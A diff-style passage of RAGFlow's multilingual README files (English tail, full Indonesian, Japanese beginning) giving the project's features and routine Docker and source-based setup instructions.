+ - Intuitive APIs for seamless integration with business.
126
+
127
+ ## 🔎 System Architecture
128
+
129
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
130
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
131
+ </div>
132
+
133
+ ## 🎬 Get Started
134
+
135
+ ### 📝 Prerequisites
136
+
137
+ - CPU >= 4 cores
138
+ - RAM >= 16 GB
139
+ - Disk >= 50 GB
140
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
141
+ > If you have not installed Docker on your local machine (Windows, Mac, or Linux),
142
+ > see [Install Docker Engine](https://docs.docker.com/engine/install/).
143
+
144
+ ### 🚀 Start up the server
145
+
146
+ 1. Ensure `vm.max_map_count` >= 262144:
147
+
148
+ > To check the value of `vm.max_map_count`:
149
+ >
150
+ > ```bash
151
+ > $ sysctl vm.max_map_count
152
+ > ```
153
+ >
154
+ > Reset `vm.max_map_count` to a value at least 262144 if it is not.
155
+ >
156
+ > ```bash
157
+ > # In this case, we set it to 262144:
158
+ > $ sudo sysctl -w vm.max_map_count=262144
159
+ > ```
160
+ >
161
+ > This change will be reset after a system reboot. To ensure your change remains permanent, add or update the
162
+ > `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
163
+ >
164
+ > ```bash
165
+ > vm.max_map_count=262144
166
+ > ```
167
+
168
+ 2. Clone the repo:
169
+
170
+ ```bash
171
+ $ git clone https://github.com/infiniflow/ragflow.git
172
+ ```
173
+
174
+ 3. Start up the server using the pre-built Docker images:
175
+
176
+ > The command below downloads the `v0.16.0-slim` edition of the RAGFlow Docker image. Refer to the following table for descriptions of different RAGFlow editions. To download an RAGFlow edition different from `v0.16.0-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server. For example: set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0` for the full edition `v0.16.0`.
177
+
178
+ ```bash
179
+ $ cd ragflow
180
+ $ docker compose -f docker/docker-compose.yml up -d
181
+ ```
182
+
183
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
184
+ |-------------------|-----------------|-----------------------|--------------------------|
185
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
186
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
187
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
188
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
189
+
190
+ 4. Check the server status after having the server up and running:
191
+
192
+ ```bash
193
+ $ docker logs -f ragflow-server
194
+ ```
195
+
196
+ _The following output confirms a successful launch of the system:_
197
+
198
+ ```bash
199
+
200
+ ____ ___ ______ ______ __
201
+ / __ \ / | / ____// ____// /____ _ __
202
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
203
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
204
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
205
+
206
+ * Running on all addresses (0.0.0.0)
207
+ * Running on http://127.0.0.1:9380
208
+ * Running on http://x.x.x.x:9380
209
+ INFO:werkzeug:Press CTRL+C to quit
210
+ ```
211
+
212
+ > If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anormal`
213
+ > error because, at that moment, your RAGFlow may not be fully initialized.
214
+
215
+ 5. In your web browser, enter the IP address of your server and log in to RAGFlow.
216
+ > With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default
217
+ > HTTP serving port `80` can be omitted when using the default configurations.
218
+ 6. In [service_conf.yaml.template](./docker/service_conf.yaml.template), select the desired LLM factory in `user_default_llm` and update
219
+ the `API_KEY` field with the corresponding API key.
220
+
221
+ > See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
222
+
223
+ _The show is on!_
224
+
225
+ ## 🔧 Configurations
226
+
227
+ When it comes to system configurations, you will need to manage the following files:
228
+
229
+ - [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and
230
+ `MINIO_PASSWORD`.
231
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template): Configures the back-end services. The environment variables in this file will be automatically populated when the Docker container starts. Any environment variables set within the Docker container will be available for use, allowing you to customize service behavior based on the deployment environment.
232
+ - [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.
233
+
234
+ > The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service
235
+ > configurations which can be used as `${ENV_VARS}` in the [service_conf.yaml.template](./docker/service_conf.yaml.template) file.
236
+
237
+ To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80`
238
+ to `<YOUR_SERVING_PORT>:80`.
239
+
240
+ Updates to the above configurations require a reboot of all containers to take effect:
241
+
242
+ > ```bash
243
+ > $ docker compose -f docker/docker-compose.yml up -d
244
+ > ```
245
+
246
+ ### Switch doc engine from Elasticsearch to Infinity
247
+
248
+ RAGFlow uses Elasticsearch by default for storing full text and vectors. To switch to [Infinity](https://github.com/infiniflow/infinity/), follow these steps:
249
+
250
+ 1. Stop all running containers:
251
+
252
+ ```bash
253
+ $ docker compose -f docker/docker-compose.yml down -v
254
+ ```
255
+
256
+ 2. Set `DOC_ENGINE` in **docker/.env** to `infinity`.
257
+
258
+ 3. Start the containers:
259
+
260
+ ```bash
261
+ $ docker compose -f docker/docker-compose.yml up -d
262
+ ```
263
+
264
+ > [!WARNING]
265
+ > Switching to Infinity on a Linux/arm64 machine is not yet officially supported.
266
+
267
+ ## 🔧 Build a Docker image without embedding models
268
+
269
+ This image is approximately 2 GB in size and relies on external LLM and embedding services.
270
+
271
+ ```bash
272
+ git clone https://github.com/infiniflow/ragflow.git
273
+ cd ragflow/
274
+ docker build --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
275
+ ```
276
+
277
+ ## 🔧 Build a Docker image including embedding models
278
+
279
+ This image is approximately 9 GB in size. As it includes embedding models, it relies on external LLM services only.
280
+
281
+ ```bash
282
+ git clone https://github.com/infiniflow/ragflow.git
283
+ cd ragflow/
284
+ docker build -f Dockerfile -t infiniflow/ragflow:nightly .
285
+ ```
286
+
287
+ ## 🔨 Launch service from source for development
288
+
289
+ 1. Install uv, or skip this step if it is already installed:
290
+
291
+ ```bash
292
+ pipx install uv
293
+ ```
294
+
295
+ 2. Clone the source code and install Python dependencies:
296
+
297
+ ```bash
298
+ git clone https://github.com/infiniflow/ragflow.git
299
+ cd ragflow/
300
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
301
+ ```
302
+
303
+ 3. Launch the dependent services (MinIO, Elasticsearch, Redis, and MySQL) using Docker Compose:
304
+
305
+ ```bash
306
+ docker compose -f docker/docker-compose-base.yml up -d
307
+ ```
308
+
309
+ Add the following line to `/etc/hosts` to resolve all hosts specified in **docker/.env** to `127.0.0.1`:
310
+
311
+ ```
312
+ 127.0.0.1 es01 infinity mysql minio redis
313
+ ```
314
+
315
+ 4. If you cannot access HuggingFace, set the `HF_ENDPOINT` environment variable to use a mirror site:
316
+
317
+ ```bash
318
+ export HF_ENDPOINT=https://hf-mirror.com
319
+ ```
320
+
321
+ 5. Launch backend service:
322
+
323
+ ```bash
324
+ source .venv/bin/activate
325
+ export PYTHONPATH=$(pwd)
326
+ bash docker/launch_backend_service.sh
327
+ ```
328
+
329
+ 6. Install frontend dependencies:
330
+ ```bash
331
+ cd web
332
+ npm install
333
+ ```
334
+ 7. Launch frontend service:
335
+
336
+ ```bash
337
+ npm run dev
338
+ ```
339
+
340
+ _The following output confirms a successful launch of the system:_
341
+
342
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
343
+
344
+ ## 📚 Documentation
345
+
346
+ - [Quickstart](https://ragflow.io/docs/dev/)
347
+ - [User guide](https://ragflow.io/docs/dev/category/guides)
348
+ - [References](https://ragflow.io/docs/dev/category/references)
349
+ - [FAQ](https://ragflow.io/docs/dev/faq)
350
+
351
+ ## 📜 Roadmap
352
+
353
+ See the [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214)
354
+
355
+ ## 🏄 Community
356
+
357
+ - [Discord](https://discord.gg/4XxujFgUN7)
358
+ - [Twitter](https://twitter.com/infiniflowai)
359
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
360
+
361
+ ## 🙌 Contributing
362
+
363
+ RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community.
364
+ If you would like to be a part, review our [Contribution Guidelines](./CONTRIBUTING.md) first.
ragflow-main/README_id.md ADDED
@@ -0,0 +1,333 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="Logo ragflow">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="Ikuti di X (Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Lencana Daring" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Rilis%20Terbaru" alt="Rilis Terbaru">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/Lisensi-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="Lisensi">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Dokumentasi</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Peta Jalan</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ <details open>
44
+ <summary></b>📕 Daftar Isi</b></summary>
45
+
46
+ - 💡 [Apa Itu RAGFlow?](#-apa-itu-ragflow)
47
+ - 🎮 [Demo](#-demo)
48
+ - 📌 [Pembaruan Terbaru](#-pembaruan-terbaru)
49
+ - 🌟 [Fitur Utama](#-fitur-utama)
50
+ - 🔎 [Arsitektur Sistem](#-arsitektur-sistem)
51
+ - 🎬 [Mulai](#-mulai)
52
+ - 🔧 [Konfigurasi](#-konfigurasi)
53
+ - 🔧 [Membangun Image Docker tanpa Model Embedding](#-membangun-image-docker-tanpa-model-embedding)
54
+ - 🔧 [Membangun Image Docker dengan Model Embedding](#-membangun-image-docker-dengan-model-embedding)
55
+ - 🔨 [Meluncurkan aplikasi dari Sumber untuk Pengembangan](#-meluncurkan-aplikasi-dari-sumber-untuk-pengembangan)
56
+ - 📚 [Dokumentasi](#-dokumentasi)
57
+ - 📜 [Peta Jalan](#-peta-jalan)
58
+ - 🏄 [Komunitas](#-komunitas)
59
+ - 🙌 [Kontribusi](#-kontribusi)
60
+
61
+ </details>
62
+
63
+ ## 💡 Apa Itu RAGFlow?
64
+
65
+ [RAGFlow](https://ragflow.io/) adalah mesin RAG (Retrieval-Augmented Generation) open-source berbasis pemahaman dokumen yang mendalam. Platform ini menyediakan alur kerja RAG yang efisien untuk bisnis dengan berbagai skala, menggabungkan LLM (Large Language Models) untuk menyediakan kemampuan tanya-jawab yang benar dan didukung oleh referensi dari data terstruktur kompleks.
66
+
67
+ ## 🎮 Demo
68
+
69
+ Coba demo kami di [https://demo.ragflow.io](https://demo.ragflow.io).
70
+
71
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
72
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
73
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
74
+ </div>
75
+
76
+ ## 🔥 Pembaruan Terbaru
77
+
78
+ - 2025-02-05 Memperbarui daftar model 'SILICONFLOW' dan menambahkan dukungan untuk Deepseek-R1/DeepSeek-V3.
79
+ - 2025-01-26 Optimalkan ekstraksi dan penerapan grafik pengetahuan dan sediakan berbagai opsi konfigurasi.
80
+ - 2024-12-18 Meningkatkan model Analisis Tata Letak Dokumen di Deepdoc.
81
+ - 2024-12-04 Mendukung skor pagerank ke basis pengetahuan.
82
+ - 2024-11-22 Peningkatan definisi dan penggunaan variabel di Agen.
83
+ - 2024-11-01 Penambahan ekstraksi kata kunci dan pembuatan pertanyaan terkait untuk meningkatkan akurasi pengambilan.
84
+ - 2024-08-22 Dukungan untuk teks ke pernyataan SQL melalui RAG.
85
+
86
+ ## 🎉 Tetap Terkini
87
+
88
+ ⭐️ Star repositori kami untuk tetap mendapat informasi tentang fitur baru dan peningkatan menarik! 🌟
89
+
90
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
91
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
92
+ </div>
93
+
94
+ ## 🌟 Fitur Utama
95
+
96
+ ### 🍭 **"Kualitas Masuk, Kualitas Keluar"**
97
+
98
+ - Ekstraksi pengetahuan berbasis pemahaman dokumen mendalam dari data tidak terstruktur dengan format yang rumit.
99
+ - Menemukan "jarum di tumpukan data" dengan token yang hampir tidak terbatas.
100
+
101
+ ### 🍱 **Pemotongan Berbasis Template**
102
+
103
+ - Cerdas dan dapat dijelaskan.
104
+ - Banyak pilihan template yang tersedia.
105
+
106
+ ### 🌱 **Referensi yang Didasarkan pada Data untuk Mengurangi Hallusinasi**
107
+
108
+ - Visualisasi pemotongan teks memungkinkan intervensi manusia.
109
+ - Tampilan cepat referensi kunci dan referensi yang dapat dilacak untuk mendukung jawaban yang didasarkan pada fakta.
110
+
111
+ ### 🍔 **Kompatibilitas dengan Sumber Data Heterogen**
112
+
113
+ - Mendukung Word, slide, excel, txt, gambar, salinan hasil scan, data terstruktur, halaman web, dan banyak lagi.
114
+
115
+ ### 🛀 **Alur Kerja RAG yang Otomatis dan Mudah**
116
+
117
+ - Orkestrasi RAG yang ramping untuk bisnis kecil dan besar.
118
+ - LLM yang dapat dikonfigurasi serta model embedding.
119
+ - Peringkat ulang berpasangan dengan beberapa pengambilan ulang.
120
+ - API intuitif untuk integrasi yang mudah dengan bisnis.
121
+
122
+ ## 🔎 Arsitektur Sistem
123
+
124
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
125
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
126
+ </div>
127
+
128
+ ## 🎬 Mulai
129
+
130
+ ### 📝 Prasyarat
131
+
132
+ - CPU >= 4 inti
133
+ - RAM >= 16 GB
134
+ - Disk >= 50 GB
135
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
136
+
137
+ ### 🚀 Menjalankan Server
138
+
139
+ 1. Pastikan `vm.max_map_count` >= 262144:
140
+
141
+ > Untuk memeriksa nilai `vm.max_map_count`:
142
+ >
143
+ > ```bash
144
+ > $ sysctl vm.max_map_count
145
+ > ```
146
+ >
147
+ > Jika nilainya kurang dari 262144, setel ulang `vm.max_map_count` ke setidaknya 262144:
148
+ >
149
+ > ```bash
150
+ > # Dalam contoh ini, kita atur menjadi 262144:
151
+ > $ sudo sysctl -w vm.max_map_count=262144
152
+ > ```
153
+ >
154
+ > Perubahan ini akan hilang setelah sistem direboot. Untuk membuat perubahan ini permanen, tambahkan atau perbarui nilai
155
+ > `vm.max_map_count` di **/etc/sysctl.conf**:
156
+ >
157
+ > ```bash
158
+ > vm.max_map_count=262144
159
+ > ```
160
+
161
+ 2. Clone repositori:
162
+
163
+ ```bash
164
+ $ git clone https://github.com/infiniflow/ragflow.git
165
+ ```
166
+
167
+ 3. Bangun image Docker pre-built dan jalankan server:
168
+
169
+ > Perintah di bawah ini mengunduh edisi v0.16.0-slim dari gambar Docker RAGFlow. Silakan merujuk ke tabel berikut untuk deskripsi berbagai edisi RAGFlow. Untuk mengunduh edisi RAGFlow yang berbeda dari v0.16.0-slim, perbarui variabel RAGFLOW_IMAGE di docker/.env sebelum menggunakan docker compose untuk memulai server. Misalnya, atur RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0 untuk edisi lengkap v0.16.0.
170
+
171
+ ```bash
172
+ $ cd ragflow
173
+ $ docker compose -f docker/docker-compose.yml up -d
174
+ ```
175
+
176
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
177
+ | ----------------- | --------------- | --------------------- | ------------------------ |
178
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
179
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
180
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
181
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
182
+
183
+ 4. Periksa status server setelah server aktif dan berjalan:
184
+
185
+ ```bash
186
+ $ docker logs -f ragflow-server
187
+ ```
188
+
189
+ _Output berikut menandakan bahwa sistem berhasil diluncurkan:_
190
+
191
+ ```bash
192
+
193
+ ____ ___ ______ ______ __
194
+ / __ \ / | / ____// ____// /____ _ __
195
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
196
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
197
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
198
+
199
+ * Running on all addresses (0.0.0.0)
200
+ * Running on http://127.0.0.1:9380
201
+ * Running on http://x.x.x.x:9380
202
+ INFO:werkzeug:Press CTRL+C to quit
203
+ ```
204
+
205
+ > Jika Anda melewatkan langkah ini dan langsung login ke RAGFlow, browser Anda mungkin menampilkan error `network anormal`
206
+ > karena RAGFlow mungkin belum sepenuhnya siap.
207
+
208
+ 5. Buka browser web Anda, masukkan alamat IP server Anda, dan login ke RAGFlow.
209
+ > Dengan pengaturan default, Anda hanya perlu memasukkan `http://IP_DEVICE_ANDA` (**tanpa** nomor port) karena
210
+ > port HTTP default `80` bisa dihilangkan saat menggunakan konfigurasi default.
211
+ 6. Dalam [service_conf.yaml.template](./docker/service_conf.yaml.template), pilih LLM factory yang diinginkan di `user_default_llm` dan perbarui
212
+ bidang `API_KEY` dengan kunci API yang sesuai.
213
+
214
+ > Lihat [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) untuk informasi lebih lanjut.
215
+
216
+ _Sistem telah siap digunakan!_
217
+
218
+ ## 🔧 Konfigurasi
219
+
220
+ Untuk konfigurasi sistem, Anda perlu mengelola file-file berikut:
221
+
222
+ - [.env](./docker/.env): Menyimpan pengaturan dasar sistem, seperti `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, dan
223
+ `MINIO_PASSWORD`.
224
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template): Mengonfigurasi aplikasi backend.
225
+ - [docker-compose.yml](./docker/docker-compose.yml): Sistem ini bergantung pada [docker-compose.yml](./docker/docker-compose.yml) untuk memulai.
226
+
227
+ Untuk memperbarui port HTTP default (80), buka [docker-compose.yml](./docker/docker-compose.yml) dan ubah `80:80`
228
+ menjadi `<YOUR_SERVING_PORT>:80`.
229
+
230
+ Pembaruan konfigurasi ini memerlukan reboot semua kontainer agar efektif:
231
+
232
+ > ```bash
233
+ > $ docker compose -f docker/docker-compose.yml up -d
234
+ > ```
235
+
236
+ ## 🔧 Membangun Docker Image tanpa Model Embedding
237
+
238
+ Image ini berukuran sekitar 2 GB dan bergantung pada aplikasi LLM eksternal dan embedding.
239
+
240
+ ```bash
241
+ git clone https://github.com/infiniflow/ragflow.git
242
+ cd ragflow/
243
+ docker build --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
244
+ ```
245
+
246
+ ## 🔧 Membangun Docker Image Termasuk Model Embedding
247
+
248
+ Image ini berukuran sekitar 9 GB. Karena sudah termasuk model embedding, ia hanya bergantung pada aplikasi LLM eksternal.
249
+
250
+ ```bash
251
+ git clone https://github.com/infiniflow/ragflow.git
252
+ cd ragflow/
253
+ docker build -f Dockerfile -t infiniflow/ragflow:nightly .
254
+ ```
255
+
256
+ ## 🔨 Menjalankan Aplikasi dari untuk Pengembangan
257
+
258
+ 1. Instal uv, atau lewati langkah ini jika sudah terinstal:
259
+
260
+ ```bash
261
+ pipx install uv
262
+ ```
263
+
264
+ 2. Clone kode sumber dan instal dependensi Python:
265
+
266
+ ```bash
267
+ git clone https://github.com/infiniflow/ragflow.git
268
+ cd ragflow/
269
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
270
+ ```
271
+
272
+ 3. Jalankan aplikasi yang diperlukan (MinIO, Elasticsearch, Redis, dan MySQL) menggunakan Docker Compose:
273
+
274
+ ```bash
275
+ docker compose -f docker/docker-compose-base.yml up -d
276
+ ```
277
+
278
+ Tambahkan baris berikut ke `/etc/hosts` untuk memetakan semua host yang ditentukan di **conf/service_conf.yaml** ke `127.0.0.1`:
279
+
280
+ ```
281
+ 127.0.0.1 es01 infinity mysql minio redis
282
+ ```
283
+
284
+ 4. Jika Anda tidak dapat mengakses HuggingFace, atur variabel lingkungan `HF_ENDPOINT` untuk menggunakan situs mirror:
285
+
286
+ ```bash
287
+ export HF_ENDPOINT=https://hf-mirror.com
288
+ ```
289
+
290
+ 5. Jalankan aplikasi backend:
291
+
292
+ ```bash
293
+ source .venv/bin/activate
294
+ export PYTHONPATH=$(pwd)
295
+ bash docker/launch_backend_service.sh
296
+ ```
297
+
298
+ 6. Instal dependensi frontend:
299
+ ```bash
300
+ cd web
301
+ npm install
302
+ ```
303
+ 7. Jalankan aplikasi frontend:
304
+
305
+ ```bash
306
+ npm run dev
307
+ ```
308
+
309
+ _Output berikut menandakan bahwa sistem berhasil diluncurkan:_
310
+
311
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
312
+
313
+ ## 📚 Dokumentasi
314
+
315
+ - [Quickstart](https://ragflow.io/docs/dev/)
316
+ - [Panduan Pengguna](https://ragflow.io/docs/dev/category/guides)
317
+ - [Referensi](https://ragflow.io/docs/dev/category/references)
318
+ - [FAQ](https://ragflow.io/docs/dev/faq)
319
+
320
+ ## 📜 Roadmap
321
+
322
+ Lihat [Roadmap RAGFlow 2025](https://github.com/infiniflow/ragflow/issues/4214)
323
+
324
+ ## 🏄 Komunitas
325
+
326
+ - [Discord](https://discord.gg/4XxujFgUN7)
327
+ - [Twitter](https://twitter.com/infiniflowai)
328
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
329
+
330
+ ## 🙌 Kontribusi
331
+
332
+ RAGFlow berkembang melalui kolaborasi open-source. Dalam semangat ini, kami menerima kontribusi dari komunitas.
333
+ Jika Anda ingin berpartisipasi, tinjau terlebih dahulu [Panduan Kontribusi](./CONTRIBUTING.md).
ragflow-main/README_ja.md ADDED
@@ -0,0 +1,327 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ ## 💡 RAGFlow とは?
44
+
45
+ [RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
46
+
47
+ ## 🎮 Demo
48
+
49
+ デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
50
+
51
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
52
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
53
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
54
+ </div>
55
+
56
+ ## 🔥 最新情報
57
+
58
+ - 2025-02-05 シリコン フローの St およびモデル リストを更新し、Deep Seek-R1/Deep Seek-V3 のサポートを追加しました。
59
+ - 2025-01-26 ナレッジ グラフの抽出と適用を最適化し、さまざまな構成オプションを提供します。
60
+ - 2024-12-18 Deepdoc のドキュメント レイアウト分析モデルをアップグレードします。
61
